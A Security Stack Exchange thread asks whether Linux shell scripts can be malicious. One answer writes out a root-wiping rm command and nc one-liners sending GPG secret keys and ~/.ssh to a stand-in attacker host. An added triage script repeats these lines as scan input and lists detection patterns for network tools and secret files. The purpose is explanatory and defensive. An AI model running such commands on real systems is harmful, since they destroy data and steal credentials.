15

Can a .sh file be a virus or something harmful? Is it like .exe files on Windows? If yes, can someone read this script** and tell me if it is safe and whether it affects GnuPG security? It gives me an option to encrypt files with a right-click on Ubuntu.

**[mod note: link removed since we no longer analyse code]

schroeder
  • 123,438
  • 55
  • 284
  • 319
rezx
  • 1,039
  • 3
  • 12
  • 20

5 Answers

40

.sh files are shell scripts. They are analogous to .bat files (cmd scripts) under Windows. All of these (shell scripts, cmd scripts, .exe Windows executables, Linux executables (which usually have no extension)) are executable programs; if you run one, it can do anything you can do. So yes, shell scripts can be harmful. Treat a shell script (or a Perl script, or a Python script, or a Ruby script, etc.) with the same suspicion you would treat any other application.

It's a bit harder to hide malware in a shell script without looking suspicious, because this is a script which can be read by people with knowledge of the scripting language. But it is not much harder; few people, even with the technical knowledge, would bother to review the code, so you could hope to go unnoticed.

As a practical matter, there is less malware for Linux floating around than for Windows. This is probably mainly because Linux has a lot less of a market share than Windows on the desktop, so the payback for writing Linux malware is less. Also, there is a long-ingrained culture of sharing little improvements to the system in the Linux world, more so than in the Windows world; so the balance of probability says that this is someone sharing a little improvement and not malware. But it could be malware posing as a little improvement. In the end, you need to decide whether you can trust the site where you're getting this application, or the people who recommended this site. Favor programs that come from your distribution (i.e. that you can install from the software center), as they have undergone some review.


Now regarding this specific program: I had a quick look, and it looks benign. I didn't see anything that would store your password anywhere without telling you or that would do things on your computer other than what it's advertised to do. Note that I only did a 2-minute review, which any remotely clever malware writer could get past. The program looks reasonably well-written.

I wouldn't necessarily recommend this program unless you feel a pressing need that isn't addressed by packages in the Ubuntu distribution. Ubuntu comes with the seahorse GUI frontend to GPG (there is also kgpg for KDE users). You may also want to install seahorse-nautilus (or seahorse-plugin in older versions) for Nautilus integration.

Glorfindel
  • 2,235
  • 6
  • 18
  • 30
Gilles 'SO- stop being evil'
  • 50,912
  • 13
  • 120
  • 179
8
#!/bin/sh
rm -rf --no-preserve-root /

That's malware, and it's a shell script. A more advanced version might include something like:

gpg --export-secret-keys | nc www.evilbadguys.com 443
tar -cz ~/.ssh | nc www.evilbadguys.com 80

So yes, a shell script can be malicious. It can get more complex and call on other scripting languages, libraries, or even be a shell archive that spits out and calls a regular executable.

For the most part, anything you run gets the permissions of the user.

Jeff Ferland
  • 38,090
  • 9
  • 93
  • 171
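
A first-pass triage for the kinds of lines quoted in the answer above, as an added example that is not part of the original posts. The function names, category labels, regexes and sample script are constructed for illustration; it generalizes slightly beyond the two commands shown (other download tools, `.gnupg`), and obfuscated code will get past it, so it narrows down what to read rather than replacing the read.

```shell
#!/bin/sh
# triage_script FILE: print "LINE:CATEGORY:TEXT" for lines that deserve a
# closer read before the script is ever executed. Heuristic only.
triage_script() {
    awk '
    /^[ \t]*#/ { next }                  # skip comments and the shebang
    {
        s = " " $0 " "                   # pad so word boundaries stay simple
        secret = (s ~ /--export-secret-keys|\.ssh|\.gnupg/)
        net    = (s ~ /[ \t|;&(](nc|ncat|curl|wget)[ \t]/ || s ~ /\/dev\/tcp\//)
        wipe   = (s ~ /[ \t|;&(]rm[ \t]+-[^ \t]*[rR]/ &&
                  s ~ /--no-preserve-root|[ \t]\/(\*)?[ \t]/)
        if (wipe)          print NR ":destructive:" $0
        if (secret && net) print NR ":exfiltration:" $0
        else if (secret)   print NR ":reads-secrets:" $0
        else if (net)      print NR ":network:" $0
    }' "$1"
}

# write_sample FILE: constructed input. It is only written and scanned,
# never run; the quoted heredoc keeps $1 and ~ literal.
write_sample() {
    cat > "$1" <<'EOF'
#!/bin/sh
# constructed sample: lines 3-4 are benign, lines 5-7 mirror the answer
gpg --symmetric --output "$1.gpg" "$1"
rm -f "$1.tmp"
rm -rf --no-preserve-root /
gpg --export-secret-keys | nc collector.example.invalid 443
tar -cz ~/.ssh | nc collector.example.invalid 80
EOF
}

sample=$(mktemp)
write_sample "$sample"
triage_script "$sample"
rm -f "$sample"
```
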
2

Of course! It can do anything you can do! Watch logs, keylog you, steal files, etc.

Depending on what its developer has written in the source code, it can do ANYTHING.

And it is very easy to make, so if you are sent a suspicious .sh file, think twice before you execute it!

ant0nisk
  • 211
  • 1
  • 4
2

A sh file can be a traditional file-infecting virus:

Both articles include source code for (older) sh viruses, although one or both have a typo that keeps them from working properly today. It's an easy fix, as I recall. Both articles appeared in the late, lamented Computing Systems, Volume 2, Number 2, Spring 1989.

That's nearly 25 years ago.

In a slightly different vein, the VAX/VMS network worms Father Xmas and WANK were both written in the VMS "shell script" language, DCL.

Gilles 'SO- stop being evil'
  • 50,912
  • 13
  • 120
  • 179
Bruce Ediger
  • 4,552
  • 2
  • 25
  • 26
1

A Unix shell script can be a virus, a worm, a Trojan horse, spyware, a logic bomb.

If a shell script is run by a privileged account, most notably root or adm, then this shell script may cause any sort of damage. It can stop the system, send back all your E-mail to any kind of commanding host, change your Unix machine into a denial of service weapon, and much much worse…

Most of this bad behaviour will be easily discovered by a serious analysis of a shell script. Hence the fact that a shell script is a weapon won't stay secret.

Why aren't shell scripts more often used to destroy all the Unix boxes? Simply because their users don't work on their OS with the same level of privileges.

  • Most Unix users, even sysadmins, never work on their system, even their personal one, logged in as an admin.
  • Most Windows users, even non-sysadmins, always work on their system, even a professional one, logged in as an admin.


The 2 shell scripts you proposed to use don't exhibit any use of dangerous commands. They don't do any kind of home call, they don't hide any back door on the system. But they do collect your user password within a variable $PASS so as to be able to use sudo without asking your password every time. Anyone on your system could see, through the right use of ps arguments, the value of this shell environment variable, i.e. your password. Subsequently, any other user of your system can use your account and acquire root privilege through sudo. Hence I wouldn't advise you to use such a kind of shell script.
dan
  • 3,033
  • 14
  • 34
  • 1
    A shell script can be a virus, even with the traditional definition of "virus": It is quite easy to write a shell script that injects itself into another shell script, for example `.profile`. Why .profile? Because that's a good place to prefix the `PATH` in order to provide wrappers for `su`, `sudo`, `ssh`. – Hendrik Brummermann Jun 03 '12 at 14:12
  • 1
    There are good and bad things in this answer. The distinction between “shell script source” and “shell script” is immaterial: the files are the same, the extension doesn't matter. Whether the user is logged as administrator isn't very important; most malware targets user accounts, and administrative access is important for malware only because it can hide better. – Gilles 'SO- stop being evil' Jun 03 '12 at 23:31
  • 1
    Environment variables are not visible to other users under Linux (I think they used to be, but that was a very long time ago). Command line arguments are. (Check the permissions in e.g. `/proc/1`.) – Gilles 'SO- stop being evil' Jun 03 '12 at 23:33
  • -> Gilles: a shell script source and a shell script differ in their modes. The 1st is typically `644` when the second is `755`. Otherwise what would be the need to make such a clear separation between a source and its executable version? Where is the need for this rule in all make's on all Unixes? – dan Jun 04 '12 at 08:58
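
The `/proc` permission check mentioned in the comments, as an added example that is not part of the original thread. It is Linux only, needs `stat` from coreutils, and the `exposure_report` name and both secret strings are constructed.

```shell
#!/bin/sh
# exposure_report: run a short-lived child that holds one constructed secret
# in its environment and another on its command line, then report how Linux
# exposes each of them through /proc.
exposure_report() {
    # "; :" keeps the shell from exec-ing sleep and replacing its own argv.
    PASS=constructed-env-secret \
        sh -c 'sleep 5; :' demo constructed-arg-secret >/dev/null 2>&1 &
    pid=$!
    sleep 1                                       # let the child finish exec

    cmd_mode=$(stat -c %a "/proc/$pid/cmdline")   # the file ps reads
    env_mode=$(stat -c %a "/proc/$pid/environ")   # the process environment
    argv=$(tr '\0' ' ' < "/proc/$pid/cmdline")

    arg_visible=no
    env_in_argv=no
    case $argv in *constructed-arg-secret*) arg_visible=yes ;; esac
    case $argv in *constructed-env-secret*) env_in_argv=yes ;; esac

    kill "$pid" 2>/dev/null || :
    echo "cmdline=$cmd_mode environ=$env_mode arg_visible=$arg_visible env_in_argv=$env_in_argv"
}

exposure_report
```

Mode 444 on `cmdline` means any local user can read the arguments, while 400 on `environ` restricts the environment to the process owner. When reviewing a script that keeps a password in a variable, the thing to look for is whether that variable is ever expanded into another command's arguments.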